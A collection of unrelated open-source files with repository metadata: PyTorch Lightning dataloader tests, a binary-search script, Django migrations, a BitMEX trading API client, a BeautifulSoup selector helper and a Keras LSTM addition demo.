def test_test_inf_dataloader_error(tmpdir):
"""Test inf train data loader (e.g. IterableDataset)"""
model = EvalModelTemplate()
model.test_dataloader = model.test_dataloader__infinite
trainer = Trainer(default_root_dir=tmpdir, max_epochs=1, limit_test_batches=0.5)
with pytest.raises(MisconfigurationException, match='infinite DataLoader'):
trainer.test(model)
@pytest.mark.parametrize('check_interval', [50, 1.0])
def test_inf_train_dataloader(tmpdir, check_interval):
"""Test inf train data loader (e.g. IterableDataset)"""
model = EvalModelTemplate()
model.train_dataloader = model.train_dataloader__infinite
trainer = Trainer(
default_root_dir=tmpdir,
max_epochs=1,
val_check_interval=check_interval,
)
result = trainer.fit(model)
# verify training completed
assert result == 1
@pytest.mark.parametrize('check_interval', [1.0])
def test_inf_val_dataloader(tmpdir, check_interval):
"""Test inf val data loader (e.g. IterableDataset)"""
model = EvalModelTemplate()
model.val_dataloader = model.val_dataloader__infinite
# logger file to get meta
trainer = Trainer(
default_root_dir=tmpdir,
max_epochs=1,
val_check_interval=check_interval,
)
result = trainer.fit(model)
# verify training completed
assert result == 1
def test_error_on_zero_len_dataloader(tmpdir):
""" Test that error is raised if a zero-length dataloader is defined """
model = EvalModelTemplate()
model.train_dataloader = model.train_dataloader__zero_length
# fit model
with pytest.raises(ValueError):
trainer = Trainer(
default_root_dir=tmpdir,
max_epochs=1,
limit_train_batches=0.1,
limit_val_batches=0.1,
limit_test_batches=0.1,
)
trainer.fit(model)
@pytest.mark.skipif(platform.system() == 'Windows', reason='Does not apply to Windows platform.')
@pytest.mark.parametrize('ckpt_path', [None, 'best', 'specific'])
@patch('pytorch_lightning.trainer.data_loading.multiprocessing.cpu_count', return_value=4)
def test_warning_with_few_workers(mock, tmpdir, ckpt_path):
""" Test that error is raised if dataloader with only a few workers is used """
model = EvalModelTemplate()
# logger file to get meta
train_dl = model.dataloader(train=True)
train_dl.num_workers = 0
val_dl = model.dataloader(train=False)
val_dl.num_workers = 0
train_dl = model.dataloader(train=False)
train_dl.num_workers = 0
fit_options = dict(train_dataloader=train_dl,
val_dataloaders=val_dl)
trainer = Trainer(
default_root_dir=tmpdir,
max_epochs=1,
limit_val_batches=0.1,
limit_train_batches=0.2,
)
# fit model
with pytest.warns(
UserWarning, match='The dataloader, train dataloader, does not have many workers which may be a bottleneck.'
):
trainer.fit(model, **fit_options)
with pytest.warns(
UserWarning, match='The dataloader, val dataloader 0, does not have many workers which may be a bottleneck.'
):
trainer.fit(model, **fit_options)
if ckpt_path == 'specific':
ckpt_path = trainer.checkpoint_callback.best_model_path
test_options = dict(test_dataloaders=train_dl, ckpt_path=ckpt_path)
with pytest.warns(
UserWarning, match='The dataloader, test dataloader 0, does not have many workers which may be a bottleneck.'
):
trainer.test(**test_options)
@pytest.mark.xfail(
parse(torch.__version__) < parse("1.4.0"),
reason="IterableDataset with __len__ before 1.4 raises",
)
def test_warning_with_iterable_dataset_and_len(tmpdir):
""" Tests that a warning messages is shown when an IterableDataset defines `__len__`. """
model = EvalModelTemplate()
original_dataset = model.train_dataloader().dataset
class IterableWithLen(IterableDataset):
def __iter__(self):
return iter(original_dataset)
def __len__(self):
return len(original_dataset)
dataloader = DataLoader(IterableWithLen(), batch_size=16)
assert _has_len(dataloader)
assert _has_iterable_dataset(dataloader)
trainer = Trainer(
default_root_dir=tmpdir,
max_steps=3,
)
with pytest.warns(UserWarning, match='Your `IterableDataset` has `__len__` defined.'):
trainer.fit(model, train_dataloader=dataloader, val_dataloaders=[dataloader])
with pytest.warns(UserWarning, match='Your `IterableDataset` has `__len__` defined.'):
trainer.test(model, test_dataloaders=[dataloader])
@pytest.mark.skipif(torch.cuda.device_count() < 2, reason='Test requires multiple GPUs')
def test_dataloader_reinit_for_subclass(tmpdir):
class CustomDataLoader(torch.utils.data.DataLoader):
def __init__(self, dataset, batch_size=1, shuffle=False, sampler=None,
batch_sampler=None, num_workers=0, collate_fn=None,
pin_memory=False, drop_last=False, timeout=0,
worker_init_fn=None, dummy_kwarg=None, **kwargs):
super().__init__(dataset, batch_size, shuffle, sampler, batch_sampler,
num_workers, collate_fn, pin_memory, drop_last, timeout,
worker_init_fn)
self.dummy_kwarg = dummy_kwarg
trainer = Trainer(
gpus=[0, 1],
num_nodes=1,
distributed_backend='ddp_spawn',
default_root_dir=tmpdir,
)
class CustomDummyObj:
sampler = None
result = trainer.auto_add_sampler(CustomDummyObj(), train=True)
assert isinstance(result, CustomDummyObj), "Wrongly reinstantiated data loader"
dataset = list(range(1000))
result = trainer.auto_add_sampler(CustomDataLoader(dataset), train=True)
assert isinstance(result, torch.utils.data.DataLoader)
assert isinstance(result, CustomDataLoader)
assert hasattr(result, 'dummy_kwarg')
# Shuffled DataLoader should also work
result = trainer.auto_add_sampler(CustomDataLoader(list(range(1000)), shuffle=True), train=True)
assert isinstance(result, torch.utils.data.DataLoader)
assert isinstance(result, CustomDataLoader)
assert hasattr(result, 'dummy_kwarg')
class CustomSampler(torch.utils.data.Sampler):
pass
# Should raise an error if existing sampler is being replaced
with pytest.raises(MisconfigurationException, match='DistributedSampler'):
trainer.auto_add_sampler(
CustomDataLoader(list(range(1000)), sampler=CustomSampler(list(range(1000)))), train=True)
class DistribSamplerCallback(Callback):
def on_train_start(self, trainer, pl_module):
train_sampler = trainer.train_dataloader.sampler
assert isinstance(train_sampler, DistributedSampler)
assert train_sampler.shuffle
def on_validation_start(self, trainer, pl_module):
val_sampler = trainer.val_dataloaders[0].sampler
assert isinstance(val_sampler, DistributedSampler)
assert not val_sampler.shuffle
def on_test_start(self, trainer, pl_module):
test_sampler = trainer.test_dataloaders[0].sampler
assert isinstance(test_sampler, DistributedSampler)
assert not test_sampler.shuffle
@pytest.mark.skipif(platform.system() == 'Windows', reason='Does not apply to Windows platform.')
@pytest.mark.skipif(torch.cuda.device_count() < 2, reason='Test requires multiple GPUs')
def test_dataloader_distributed_sampler(tmpdir):
""" Test DistributedSampler and it's arguments for DDP backend """
model = EvalModelTemplate()
trainer = Trainer(
gpus=[0, 1],
num_nodes=1,
distributed_backend='ddp_spawn',
default_root_dir=tmpdir,
max_steps=1,
callbacks=[DistribSamplerCallback()]
)
trainer.fit(model)
trainer.test(ckpt_path=None)
@pytest.mark.skipif(torch.cuda.device_count() < 3, reason='Test requires multiple GPUs')
def test_batch_size_smaller_than_num_gpus(tmpdir):
# we need at least 3 gpus for this test
num_gpus = 3
batch_size = 3
class CurrentTestModel(EvalModelTemplate):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# batch norm doesn't work with batch size 1, we replace it
self.c_d1_bn = torch.nn.ReLU()
def training_step(self, *args, **kwargs):
output = super().training_step(*args, **kwargs)
loss = output['loss']
# we make sure to add some metrics to the output dict,
# this is essential for this test
output['progress_bar'] = {'train_loss': loss}
return output
def train_dataloader(self):
dataloader = super().train_dataloader()
# construct a dataset with a size that is not divisible by num_gpus
# therefore the last batch will have a size < num_gpus
size = num_gpus * batch_size + (num_gpus - 1)
dataset = Subset(dataloader.dataset, range(size))
dataloader = DataLoader(
dataset,
batch_size=self.batch_size,
drop_last=False,
)
return dataloader
hparams = EvalModelTemplate.get_default_hparams()
hparams['batch_size'] = batch_size
model = CurrentTestModel(**hparams)
trainer = Trainer(
default_root_dir=tmpdir,
max_epochs=1,
limit_train_batches=0.1,
limit_val_batches=0,
gpus=num_gpus,
)
# we expect the reduction for the metrics also to happen on the last batch
# where we will get fewer metrics than gpus
result = trainer.fit(model)
assert 1 == result
@pytest.mark.parametrize('check_interval', [1.0])
def test_val_dataloader_not_implemented_error(tmpdir, check_interval):
"""Test not_implemented_error data loader (e.g. IterableDataset)"""
model = EvalModelTemplate()
model.val_dataloader = model.val_dataloader__not_implemented_error
# logger file to get meta
trainer = Trainer(
default_root_dir=tmpdir,
max_steps=5,
max_epochs=1,
val_check_interval=check_interval,
)
result = trainer.fit(model)
# verify training completed
assert result == 1
@pytest.mark.parametrize('check_interval', [50, 1.0])
def test_train_dataloader_not_implemented_error(tmpdir, check_interval):
"""Test not_implemented_error train data loader (e.g. IterableDataset)"""
model = EvalModelTemplate()
model.train_dataloader = model.train_dataloader__not_implemented_error
model.val_dataloader = model.val_dataloader__not_implemented_error
trainer = Trainer(
default_root_dir=tmpdir,
max_steps=5,
max_epochs=1,
val_check_interval=check_interval
)
result = trainer.fit(model)
# verify training completed
assert result == 1
def test_train_dataloader_not_implemented_error_failed(tmpdir):
"""Test not_implemented_error train data loader (e.g. IterableDataset)"""
model = EvalModelTemplate()
model.train_dataloader = model.train_dataloader__not_implemented_error
trainer = Trainer(default_root_dir=tmpdir, max_steps=5, max_epochs=1, val_check_interval=0.5)
with pytest.raises(MisconfigurationException, match='infinite DataLoader'):
trainer.fit(model)
def test_val_dataloader_not_implemented_error_failed(tmpdir):
"""Test not_implemented_error train data loader (e.g. IterableDataset)"""
model = EvalModelTemplate()
model.val_dataloader = model.val_dataloader__not_implemented_error
trainer = Trainer(default_root_dir=tmpdir, max_steps=5, max_epochs=1, limit_val_batches=0.5)
with pytest.raises(MisconfigurationException, match='infinite DataLoader'):
trainer.fit(model)
def test_test_dataloader_not_implemented_error_failed(tmpdir):
"""Test not_implemented_error train data loader (e.g. IterableDataset)"""
model = EvalModelTemplate()
model.test_dataloader = model.test_dataloader__not_implemented_error
trainer = Trainer(default_root_dir=tmpdir, max_steps=5, max_epochs=1, limit_test_batches=0.5)
with pytest.raises(MisconfigurationException, match='infinite DataLoader'):
trainer.test(model)
| [
"noreply@github.com"
] | scarecrow1123.noreply@github.com |
b1a6ae217e2b8adfa46ab725eabf7af800362709 | 256b02688ffce4b5a1fd009bc9eb3d8b3dc4a21b | /02/litianzeng/binary_search.py | c7dfa345f2c6a163a9fd392abb94084cf84351e7 | [] | no_license | yyuan9/actual_06_homework_mage | 72324ddd7a8c45233f7bb07245cfa2f06091f014 | 3bb81d2d5478cee52e56f4180dabcecba3c7eeb9 | refs/heads/master | 2020-05-13T03:11:15.257388 | 2017-08-18T07:33:22 | 2017-08-18T07:33:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 695 | py | #encodinf:utf-8
list_nums=[6, 3, 2, 6, 9, 11, 15, 17, 20, 26, 9, 38, 45, 69, 50, 55, 61, 68, 73]
list_nums.sort()
find_nums=input('数据为{list}\n输入你想查找的数字:'.format(list=list_nums))
find_nums=int(find_nums)
low=0
high=len(list_nums)
if find_nums in list_nums:
while True:
mid=(low+high)//2
if find_nums>list_nums[mid]:
low=mid+1
elif find_nums<list_nums[mid]:
high=mid-1
else:
find_nums=list_nums[mid]
print('查找的数字{0}索引位置为{1}'.format(find_nums,mid))
break
else:
print('请输入在',list_nums,'中存在的数字')
| [
"ltz150@163.com"
] | ltz150@163.com |
135e991bc86f84ddffd73260ec00cc4abd128f28 | 5406907c05b12e6e94d19d871960a946252018bf | /backend/src/members/migrations/0002_alter_members_rank.py | ba85dde5613228b6981dba6a282b431e82579de2 | [
"MIT"
] | permissive | kfriden/HouseOfTric | 3a22e8bcc5934a56cc36d160f371a4a90fb47668 | b32fca5dd2045b158f73530109616e6eca984158 | refs/heads/master | 2023-09-01T06:26:04.522987 | 2021-11-05T00:15:02 | 2021-11-05T00:15:02 | 387,297,731 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 375 | py | # Generated by Django 3.2.6 on 2021-08-25 01:57
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('members', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='members',
name='rank',
field=models.CharField(max_length=120),
),
]
| [
"kfriden@verizon.net"
] | kfriden@verizon.net |
9c3e255d923da6dcf06005d708128fcebe7dc196 | 99136b42e06baacc569c318494af2a1899771534 | /bitmex_basic.py | fdd64fc2124d8f2c777f6a9f651e5ed31cefbb5d | [] | no_license | Elder89/bitmex_trade | 901c621a672d5f14f18c09ef247eb778097fc805 | 258982e4f9e33922fc02208ce25cc6ff4bdb5061 | refs/heads/master | 2021-08-16T23:52:25.280391 | 2017-11-20T14:24:49 | 2017-11-20T14:24:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,632 | py | from requests.auth import AuthBase
import requests
from time import sleep
import json
import math
import uuid
from time import sleep
import time
import hmac
import hashlib
import urllib.request
import sys
import os
import urllib.parse as urlparse
import base64
class APIKeyAuthWithExpires(AuthBase):
"""Attaches API Key Authentication to the given Request object. This implementation uses `expires`."""
def __init__(self, apiKey, apiSecret):
"""Init with Key & Secret."""
self.apiKey = apiKey
self.apiSecret = apiSecret
def __call__(self, r):
"""
Called when forming a request - generates api key headers. This call uses `expires` instead of nonce.
This way it will not collide with other processes using the same API Key if requests arrive out of order.
For more details, see https://www.bitmex.com/app/apiKeys
"""
# modify and return the request
expires = int(round(time.time()) + 5) # 5s grace period in case of clock skew
r.headers['api-expires'] = str(expires)
r.headers['api-key'] = self.apiKey
r.headers['api-signature'] = self.generate_signature(self.apiSecret, r.method, r.url, expires, r.body or '')
return r
def generate_signature(self, secret, verb, url, nonce, data):
"""Generate a request signature compatible with BitMEX."""
parsedURL = urlparse.urlparse(url)
path = parsedURL.path
if parsedURL.query:
path = path + '?' + parsedURL.query
# print "Computing HMAC: %s" % verb + path + str(nonce) + data
message = bytes(verb + path + str(nonce) + data, "utf-8")
signature = hmac.new(secret.encode("UTF-8"), message, digestmod=hashlib.sha256).hexdigest()
return signature
class BitMEX(object):
"""BitMEX API Connector."""
def __init__(self, symbol=None, apiKey=None, apiSecret=None, base_uri='https://www.bitmex.com/api/v1/'
, orderIDPrefix='mm_bitmex_'):
"""Init connector."""
self.base_uri = base_uri
self.symbol = symbol
self.apiKey = apiKey
self.apiSecret = apiSecret
if len(orderIDPrefix) > 13:
raise ValueError("settings.ORDERID_PREFIX must be at most 13 characters long!")
self.orderIDPrefix = orderIDPrefix
# Prepare HTTPS session
self.session = requests.Session()
def get_json_secret_data(self, path, postdict=None, verb=None):
url = self.base_uri + path
if not verb:
verb = 'POST' if postdict else 'GET'
nonce = int(time.time())
data=''
try:
message = bytes(verb + path + str(nonce) + data, "utf-8")
signing = hmac.new(self.apiSecret.encode("UTF-8"), message, digestmod=hashlib.sha512).hexdigest()
headers = {'api-signature': signing, 'api-key': self.apiKey, 'api-expires': str(nonce)}
path = self.base_uri + path
res = urllib.request.Request(path, headers=headers)
data = json.loads(urllib.request.urlopen(res).read())
return data
except urllib.error.HTTPError as e:
print('HTTPError: ', e)
sys.exit(1)
except json.JSONDecodeError as e:
print('JSONDecodeError: ', e)
sys.exit(1)
def _curl_bitmex(self, path, query=None, postdict=None, timeout=3, verb=None):
"""Send a request to BitMEX Servers."""
# Handle URL
url = self.base_uri + path
# Default to POST if data is attached, GET otherwise
if not verb:
verb = 'POST' if postdict else 'GET'
# Auth: Use Access Token by default, API Key/Secret if provided
if self.apiKey:
auth = APIKeyAuthWithExpires(self.apiKey, self.apiSecret)
# Make the request
try:
req = requests.Request(verb, url, data=postdict, auth=auth, params=query)
prepped = self.session.prepare_request(req)
response = self.session.send(prepped, timeout=timeout)
# Make non-200s throw
response.raise_for_status()
except requests.exceptions.HTTPError as e:
# 401 - Auth error. Re-auth and re-run this request.
if response.status_code == 401:
print("Token expired, reauthenticating...")
sleep(1)
return self._curl_bitmex(path, query, postdict, timeout, verb)
# 404, can be thrown if order canceled does not exist.
elif response.status_code == 404:
if verb == 'DELETE':
print("Order not found: %s" % postdict['orderID'])
return
print("Unable to contact the BitMEX API (404). " + \
"Request: %s \n %s" % (url, json.dumps(postdict)))
exit(1)
# 503 - BitMEX temporary downtime, likely due to a deploy. Try again
elif response.status_code == 503:
print("Unable to contact the BitMEX API (503), retrying. " + \
"Request: %s \n %s" % (url, json.dumps(postdict)))
sleep(1)
return self._curl_bitmex(path, query, postdict, timeout, verb)
# Unknown Error
else:
print("Unhandled Error:", e, response.text)
print("Endpoint was: %s %s" % (verb, path))
exit(1)
except requests.exceptions.Timeout as e:
# Timeout, re-run this request
print("Timed out, retrying...")
return self._curl_bitmex(path, query, postdict, timeout, verb)
except requests.exceptions.ConnectionError as e:
print("Unable to contact the BitMEX API (ConnectionError). Please check the URL. Retrying. " + \
"Request: %s \n %s" % (url, json.dumps(postdict)))
sleep(1)
return self._curl_bitmex(path, query, postdict, timeout, verb)
return response.json()
def funds(self):
"""Get your current balance."""
return self._curl_bitmex(path="user/margin")
def market_depth(self,depth=10):
"""Get market depth / orderbook."""
path = "orderBook"
return self._curl_bitmex(path=path, query={'symbol': self.symbol, 'depth': depth})
def buy(self, quantity, price=None):
"""Place a buy order.
Returns order object. ID: orderID
price指定なしで成り行き
"""
return self.place_order(quantity, price=None)
def sell(self, quantity, price):
"""Place a sell order.
Returns order object. ID: orderID
price指定なしで成り行き
"""
return self.place_order(-quantity, price)
def place_order(self, quantity, price):
"""Place an order."""
#if price < 0:
# raise Exception("Price must be positive.")
endpoint = "order"
# Generate a unique clOrdID with our prefix so we can identify it.
clOrdID = self.orderIDPrefix + base64.b64encode(uuid.uuid4().bytes).decode('utf8').rstrip('=\n')
postdict = {
'symbol': self.symbol,
'quantity': quantity,
'price': price,
'clOrdID': clOrdID
}
return self._curl_bitmex(path=endpoint, postdict=postdict, verb="POST")
def cancel(self, orderID):
"""Cancel an existing order."""
path = "order"
postdict = {
'orderID': orderID,
}
return self._curl_bitmex(path=path, postdict=postdict, verb="DELETE")
def closeAllPosition(self, price=None):
"""priceを指定しないと、成り行きで全決済"""
path = "order/closePosition"
postdict = {
'symbol': self.symbol,
'price': price,
}
return self._curl_bitmex(path=path, postdict=postdict, verb="POST")
def position(self):
"""open中のposition確認,無ければ[]"""
position_json = self._curl_bitmex(path="position")
open_position = []
for position in position_json:
if position['isOpen'] == True:
open_position.append(position)
return open_position
def wallet(self):
"""wallet確認なぜ割り算しなればいけないのか不明"""
return self._curl_bitmex(path="user/walletSummary")[-1]['marginBalance']/100000000
#bit_mex = BitMEX(symbol='XBTUSD', apiKey=os.environ["API_TEST_KEY"], apiSecret=os.environ["API_TEST_SECRET"], base_uri='https://testnet.bitmex.com/api/v1/')
#print(bit_mex.wallet())
| [
"h.s.298355@gmail.com"
] | h.s.298355@gmail.com |
7851381b34746f3487ce259477ca9681dcb2349a | 32cfd6a8df9b24059ed7bee0b7bf99b6c0268f6e | /framework/seocortex/utils/soupselect_old.py | 2498bc8d37f106ed475746dca6bdd246a3d6be44 | [] | no_license | blorenz/seocortex | 5cd7acb647fbc4908e6045d2a89bdd2ade922434 | 3f1f7e8ac4a12e24e7f2cb58407ce52babfe5cf8 | refs/heads/master | 2016-09-05T21:36:01.039128 | 2012-04-23T13:33:46 | 2012-04-23T13:33:46 | 3,951,299 | 0 | 3 | null | null | null | null | UTF-8 | Python | false | false | 4,621 | py | # -*-coding:Utf-8 -*
# Copyright 2012 - Peoplze.com <contact@peoplze.com>
# Python imports
import re
def attrInNode(node,atr):
for k,val in node.attrs:
if k == atr:
return True
return False
def htmlFind(node,selector,n,defaut=""):
l = list(node.findSelect(selector))
if len(l) > n:
return l[n].text
else:
return defaut
tag_re = re.compile('^[a-z0-9]+$')
attribselect_re = re.compile(
r'^(?P<tag>\w+)?\[(?P<attribute>\w+)(?P<operator>[=~\|\^\$\*]?)' +
r'=?"?(?P<value>[^\]"]*)"?\]$'
)
# /^(\w+)\[(\w+)([=~\|\^\$\*]?)=?"?([^\]"]*)"?\]$/
# \---/ \---/\-------------/ \-------/
# | | | |
# | | | The value
# | | ~,|,^,$,* or =
# | Attribute
# Tag
def attribute_checker(operator, attribute, value=''):
"""
Takes an operator, attribute and optional value; returns a function that
will return True for elements that match that combination.
"""
return {
'=': lambda el: el.get(attribute) == value,
# attribute includes value as one of a set of space separated tokens
'~': lambda el: value in el.get(attribute, '').split(),
# attribute starts with value
'^': lambda el: el.get(attribute, '').startswith(value),
# attribute ends with value
'$': lambda el: el.get(attribute, '').endswith(value),
# attribute contains value
'*': lambda el: value in el.get(attribute, ''),
# attribute is either exactly value or starts with value-
'|': lambda el: el.get(attribute, '') == value \
or el.get(attribute, '').startswith('%s-' % value),
}.get(operator, lambda el: el.has_key(attribute))
def has_attr(soup, attr_name):
return attr_name in soup._getAttrMap()
def select(soup, selector):
"""
soup should be a BeautifulSoup instance; selector is a CSS selector
specifying the elements you want to retrieve.
"""
tokens = selector.split()
current_context = [soup]
for token in tokens:
m = attribselect_re.match(token)
if m:
# Attribute selector
tag, attribute, operator, value = m.groups()
if not tag:
tag = True
checker = attribute_checker(operator, attribute, value)
found = []
for context in current_context:
found.extend([el for el in context.findAll(tag) if checker(el)])
current_context = found
continue
if '#' in token:
# ID selector
tag, id = token.split('#', 1)
if not tag:
tag = True
el = current_context[0].find(tag, {'id': id})
if not el:
return [] # No match
current_context = [el]
continue
if '.' in token:
# Class selector
tag, klass = token.split('.', 1)
if not tag:
tag = True
classes = set(klass.split('.'))
found = []
for context in current_context:
found.extend(
context.findAll(tag,
{'class': lambda attr:
attr and classes.issubset(attr.split())}
)
)
current_context = found
continue
if token == '*':
# Star selector
found = []
for context in current_context:
found.extend(context.findAll(True))
current_context = found
continue
# Here we should just have a regular tag
if not tag_re.match(token):
return []
found = []
for context in current_context:
found.extend(context.findAll(token))
current_context = found
return current_context
def monkeypatch(BeautifulSoupClass=None):
"""
If you don't explicitly state the class to patch, defaults to the most
common import location for BeautifulSoup.
"""
if not BeautifulSoupClass:
# Je patch Tag, parce que c'est plus pratique a mon avis
from BeautifulSoup import Tag as BeautifulSoupClass
BeautifulSoupClass.findSelect = select
BeautifulSoupClass.has_attr = has_attr
def unmonkeypatch(BeautifulSoupClass=None):
if not BeautifulSoupClass:
from BeautifulSoup import Tag as BeautifulSoupClass
delattr(BeautifulSoupClass, 'findSelect')
delattr(BeautifulSoupClass, 'has_attr')
# Monkeypatch on import
monkeypatch()
| [
"blorenz@gmail.com"
] | blorenz@gmail.com |
3c0aa37db19014c3b157d9ace989b76bf437a1de | 529bb3ed31da78d1818e387d209fb2e783f14c4b | /blog/migrations/0002_add_thumbnail.py | ba65352ecb458a3776bc3337e20246c6b7c70725 | [] | no_license | bendavis78/django-simpleblog | 773c81dc6fe0bf6f95503cfc39acec77ff4d95c7 | f75a8a369615106d2a9bb02fe383e32f46b5943b | refs/heads/master | 2016-09-06T06:18:33.709241 | 2011-06-03T04:47:27 | 2011-06-03T04:47:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,854 | py | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Post.thumbnail'
db.add_column('blog_post', 'thumbnail', self.gf('django.db.models.fields.files.ImageField')(max_length=100, null=True, blank=True), keep_default=False)
def backwards(self, orm):
# Deleting field 'Post.thumbnail'
db.delete_column('blog_post', 'thumbnail')
models = {
'blog.category': {
'Meta': {'object_name': 'Category'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'db_index': 'True'})
},
'blog.post': {
'Meta': {'object_name': 'Post'},
'body': ('django.db.models.fields.TextField', [], {}),
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['blog.Category']", 'null': 'True', 'blank': 'True'}),
'date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'db_index': 'True'}),
'tags': ('django.db.models.fields.CharField', [], {'max_length': '250', 'blank': 'True'}),
'thumbnail': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '250'})
}
}
complete_apps = ['blog']
| [
"bendavis78@gmail.com"
] | bendavis78@gmail.com |
3ca8fc6f5c55e2aa5a3785ebf17476db2b8dd918 | 1e3279c3ba088e0f1fa6b9fb4935c45383117b0a | /demo/lstm_encoder_decoder/encoder_decoder_lstm.py | 75128d3905414631734e12b91b8d0e954466cf46 | [] | no_license | pleiadian53/tpheno | fcbeb70bc07e6ce7f1b1c19db99fd8b2a8079bf4 | b8692f84143856ff672b3c7432f83c5aa5fe3bb2 | refs/heads/master | 2023-01-22T04:10:46.862687 | 2020-12-04T21:11:03 | 2020-12-04T21:11:03 | 318,626,246 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,156 | py | from random import seed
from random import randint
from numpy import array
from math import ceil
from math import log10
from math import sqrt
from numpy import argmax
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import LSTM
from keras.layers import TimeDistributed
from keras.layers import RepeatVector
import random, os, re
# generate lists of random integers and their sum
def random_sum_pairs(n_examples, n_numbers, largest):
X, y = list(), list()
for i in range(n_examples):
in_pattern = [randint(1,largest) for _ in range(n_numbers)]
out_pattern = sum(in_pattern)
X.append(in_pattern)
y.append(out_pattern)
return X, y
# convert data to strings
def to_string(X, y, n_numbers, largest):
max_length = int(n_numbers * ceil(log10(largest+1)) + n_numbers - 1)
Xstr = list()
for pattern in X:
strp = '+'.join([str(n) for n in pattern])
strp = ''.join([' ' for _ in range(max_length-len(strp))]) + strp
Xstr.append(strp)
max_length = int(ceil(log10(n_numbers * (largest+1))))
ystr = list()
for pattern in y:
strp = str(pattern)
strp = ''.join([' ' for _ in range(max_length-len(strp))]) + strp
ystr.append(strp)
return Xstr, ystr
# integer encode strings
def integer_encode(X, y, alphabet):
char_to_int = dict((c, i) for i, c in enumerate(alphabet))
Xenc = list()
for pattern in X:
integer_encoded = [char_to_int[char] for char in pattern]
Xenc.append(integer_encoded)
yenc = list()
for pattern in y:
integer_encoded = [char_to_int[char] for char in pattern]
yenc.append(integer_encoded)
return Xenc, yenc
# one hot encode
def one_hot_encode(X, y, max_int):
Xenc = list()
for seq in X:
pattern = list()
for index in seq:
vector = [0 for _ in range(max_int)]
vector[index] = 1
pattern.append(vector)
Xenc.append(pattern)
yenc = list()
for seq in y:
pattern = list()
for index in seq:
vector = [0 for _ in range(max_int)]
vector[index] = 1
pattern.append(vector)
yenc.append(pattern)
return Xenc, yenc
# generate an encoded dataset
def generate_data(n_samples, n_numbers, largest, alphabet):
def test_string_data(X, y, idx=None, n=5): # X, y
n = X.shape[0]
if idx is None:
idx = random.sample(range(n), min(len(X), n))
Xt = X[idx]
print(' + Xt:\n%s\n' % Xt)
yt = y[idx]
print(' + yt:\n%s\n' % yt)
return idx
def test_one_hot(X, y, idx=None, n=5): # X, y
n = X.shape[0]
if idx is None:
idx = random.sample(range(n), min(len(X), n))
Xt = X[idx]
print(' + Xt:\n%s\n' % Xt)
yt = y[idx]
print(' + yt:\n%s\n' % yt)
return idx
# generate pairs
X, y = random_sum_pairs(n_samples, n_numbers, largest)
# convert to strings
X, y = to_string(X, y, n_numbers, largest)
print(' + X:\n%s\n' % X[:10])
# idx = test_string_data(X, y, n=5)
# integer encode
X, y = integer_encode(X, y, alphabet)
# test_one_hot(X, y, idx=idx)
# one hot encode
X, y = one_hot_encode(X, y, len(alphabet))
# return as numpy arrays
X, y = array(X), array(y)
return X, y
# invert encoding
def invert(seq, alphabet):
int_to_char = dict((i, c) for i, c in enumerate(alphabet))
strings = list()
for pattern in seq:
string = int_to_char[argmax(pattern)]
strings.append(string)
return ''.join(strings)
# configure problem
def app(**kargs):
# number of math terms
n_terms = 3
# largest value for any single input digit
largest = 10
# scope of possible symbols for each input or output time step
alphabet = [str(x) for x in range(10)] + ['+', ' ']
# size of alphabet: (12 for 0-9, + and ' ')
n_chars = len(alphabet)
# length of encoded input sequence (8 for '10+10+10)
n_in_seq_length = int(n_terms * ceil(log10(largest+1)) + n_terms - 1)
# length of encoded output sequence (2 for '30')
n_out_seq_length = int(ceil(log10(n_terms * (largest+1))))
# define LSTM
model = Sequential()
model.add(LSTM(75, input_shape=(n_in_seq_length, n_chars)))
model.add(RepeatVector(n_out_seq_length))
model.add(LSTM(50, return_sequences=True))
model.add(TimeDistributed(Dense(n_chars, activation='softmax')))
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
print(model.summary())
# fit LSTM
X, y = generate_data(75000, n_terms, largest, alphabet)
model.fit(X, y, epochs=1, batch_size=32)
# evaluate LSTM
X, y = generate_data(100, n_terms, largest, alphabet)
loss, acc = model.evaluate(X, y, verbose=0)
print('Loss: %f, Accuracy: %f' % (loss, acc*100))
# predict
for _ in range(10):
# generate an input-output pair
X, y = generate_data(1, n_terms, largest, alphabet)
# make prediction
yhat = model.predict(X, verbose=0)
# decode input, expected and predicted
in_seq = invert(X[0], alphabet)
out_seq = invert(y[0], alphabet)
predicted = invert(yhat[0], alphabet)
print('%s = %s (expect %s)' % (in_seq, predicted, out_seq))
return
def t_encode_decode(**kargs):
return
def test(**kargs):
def show_examples(X, y, n=10):
for i, x in enumerate(X):
print(' + [%d] x=%s' % (i, x))
print(' y=%s' % y)
if i >= n: break
return
# number of math terms
n_terms = 3
# largest value for any single input digit
largest = 10
# scope of possible symbols for each input or output time step
alphabet = [str(x) for x in range(10)] + ['+', ' ']
# size of alphabet: (12 for 0-9, + and ' ')
n_chars = len(alphabet)
# length of encoded input sequence (8 for '10+10+10)
n_in_seq_length = int(n_terms * ceil(log10(largest+1)) + n_terms - 1)
# length of encoded output sequence (2 for '30')
n_out_seq_length = int(ceil(log10(n_terms * (largest+1))))
### main application
# app(**kargs)
### data generation
X, y = generate_data(75000, n_terms, largest, alphabet)
show_examples(X, y, n=2)
return
if __name__ == "__main__":
test()
| [
"barnettchiu@gmail.com"
] | barnettchiu@gmail.com |
